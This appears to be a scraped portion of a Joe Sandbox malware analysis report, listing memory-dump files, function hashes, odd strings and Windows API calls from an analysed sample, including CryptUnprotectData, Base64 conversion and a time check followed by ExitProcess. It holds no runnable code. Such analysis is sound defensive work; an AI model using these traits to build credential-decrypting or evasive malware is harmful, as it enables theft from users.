Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 4A3h$EU~Z$fnn$ids}$ids}
API String ID: 0-1867309859
Opcode ID: f0264e3faf5a44080e12d62f2ed74c667db8b1b322478876825e7487371953c7
Instruction ID: 16a48fc4a0b50bbb853168f3d14ba238aad7f64b4ae6d6aad2f2d0b0685c0a9e
Opcode Fuzzy Hash: f0264e3faf5a44080e12d62f2ed74c667db8b1b322478876825e7487371953c7
Instruction Fuzzy Hash: 7DB2F8F360C2049FE304AE2DEC8567AFBE9EF94720F16493DE6C5C7744EA3598048696

Function 004C1765 Relevance: 7.9, Strings: 5, Instructions: 1631COMMON

Download Yara Rule

Strings

1o~, xrefs: 004C2A15
q'fs, xrefs: 004C1813
pqs, xrefs: 004C270A
&rkk, xrefs: 004C1860
ji[s, xrefs: 004C19C8

Memory Dump Source

Source File: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: &rkk$1o~$ji[s$pqs$q'fs
API String ID: 0-3363578645
Opcode ID: de477f217c4b45449588b6c073516152fbd4be90720ffc7b1cde945773b50aa6
Instruction ID: 6da40d2c3000b1c15da61d132b6805a285a2956bd6d9cc68d73b1df6bd906c01
Opcode Fuzzy Hash: de477f217c4b45449588b6c073516152fbd4be90720ffc7b1cde945773b50aa6
Instruction Fuzzy Hash: E6B207F3A0C2049FE314AE29EC8577AF7E9EB94720F1A493DE6C5C7744EA3558008697

Function 00106920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 0010696C
sscanf.NTDLL ref: 00106999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001069B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001069C0
ExitProcess.KERNEL32 ref: 001069DA

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 9d0e8decfc6ad4ecfa48694a43fe0a243333590a2517122acb03bf907fa4b771
Instruction ID: 8fd4c67525f10dfb30c2db9c7d569aec299174051f838c44d762a413db712f59
Opcode Fuzzy Hash: 9d0e8decfc6ad4ecfa48694a43fe0a243333590a2517122acb03bf907fa4b771
Instruction Fuzzy Hash: 1A21E9B5D00208AFCF04EFE4D985AEEB7B9BF48300F04852AE446E3250EB745604CBA9

Function 000F7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 000F724D
RtlAllocateHeap.NTDLL(00000000), ref: 000F7254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000F7281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000F72A4
LocalFree.KERNEL32(?), ref: 000F72AE

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: ce0f2af1848e6728099f07c8236a0de6acf37f651c604eff27dc6084de68484e
Instruction ID: 2d2df7fee139916a44e2637ff6e04db4c7ec9c97ce30bca1802df7f9400fb997
Opcode Fuzzy Hash: ce0f2af1848e6728099f07c8236a0de6acf37f651c604eff27dc6084de68484e
Instruction Fuzzy Hash: CF011275A40208BBDB15DFD4DD89FAD77B8EB44700F104158FB05BB2C0D7B0AA009B65

Function 004BABF4 Relevance: 6.6, Strings: 4, Instructions: 1621COMMON

Download Yara Rule

Strings

TY1e, xrefs: 004BBB16
@Nm, xrefs: 004BAE19
Us^, xrefs: 004BB365
Kd_/, xrefs: 004BBA11

Memory Dump Source

Source File: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: @Nm$Kd_/$TY1e$Us^
API String ID: 0-4102025286
Opcode ID: 2800cea09fde43bed79d253c10b8042ce844fb04e2dd767e11be66ae0e6ebae0
Instruction ID: a991a21abb2881a39ccfe28fdd62e048da3d1c757e61dcbb30830f4ad3865f87
Opcode Fuzzy Hash: 2800cea09fde43bed79d253c10b8042ce844fb04e2dd767e11be66ae0e6ebae0
Instruction Fuzzy Hash: A8B2E4B360C2009FE304AE2DEC8567AF7E5EF94720F1A892DE6C4C7744EA3598458797

Function 004C4E05 Relevance: 6.6, Strings: 4, Instructions: 1586COMMON

Download Yara Rule

Strings

\, xrefs: 004C5CAB
L[?_, xrefs: 004C5AD5
X.__, xrefs: 004C5441
TqwO, xrefs: 004C58DF

Memory Dump Source

Source File: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: L[?_$TqwO$X.__$\
API String ID: 0-3589650939
Opcode ID: 15a0cb347e320a7c59d415ece8e9b55741d0b33a41ae1fc634e7b453094e71ef
Instruction ID: 79f706deddc58a85e196a7b8272507aa3fd54379524135648b706328eae4e3e8
Opcode Fuzzy Hash: 15a0cb347e320a7c59d415ece8e9b55741d0b33a41ae1fc634e7b453094e71ef
Instruction Fuzzy Hash: 67B219F360C2049FE704AE29EC8577ABBE5EF94320F1A493DEAC5C3744EA3558058697

Function 00108EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,000F5184,40000001,00000000,00000000,?,000F5184), ref: 00108EC0

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 0e832a3e9f92feed29f71b22e7caf724addda23c6f5ed7666b6e6d98d177d916
Instruction ID: 879b8009beca4019611af8d224431807919f164f16f51c7bb146e52356dab6e8
Opcode Fuzzy Hash: 0e832a3e9f92feed29f71b22e7caf724addda23c6f5ed7666b6e6d98d177d916
Instruction Fuzzy Hash: 0A112A70204209FFDB04CF64D885FAB37A9AF89304F109448F9998B290DBB5EC41DB60

Function 000F9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000F4EEE,00000000,00000000), ref: 000F9AEF
LocalAlloc.KERNEL32(00000040,?,?,?,000F4EEE,00000000,?), ref: 000F9B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000F4EEE,00000000,00000000), ref: 000F9B2A
LocalFree.KERNEL32(?,?,?,?,000F4EEE,00000000,?), ref: 000F9B3F

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: bd34758e676c877b292db5f2d6aa8d0338cc0914a8f928eab9cddbb302a68287
Instruction ID: d3f9a21206aa141a096b834185e8bc8a43dcf716ae0f62588810e2b3ab073b72
Opcode Fuzzy Hash: bd34758e676c877b292db5f2d6aa8d0338cc0914a8f928eab9cddbb302a68287
Instruction Fuzzy Hash: 4A11A4B4240208AFEB51CF64DC95FAA77B9FB89700F208058FA159F3D0C775A901DB50

Function 004C68BC Relevance: 5.4, Strings: 3, Instructions: 1647COMMON

Download Yara Rule

Strings

0FG, xrefs: 004C7157
[%w, xrefs: 004C7982
<>., xrefs: 004C69C5

Memory Dump Source

Source File: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
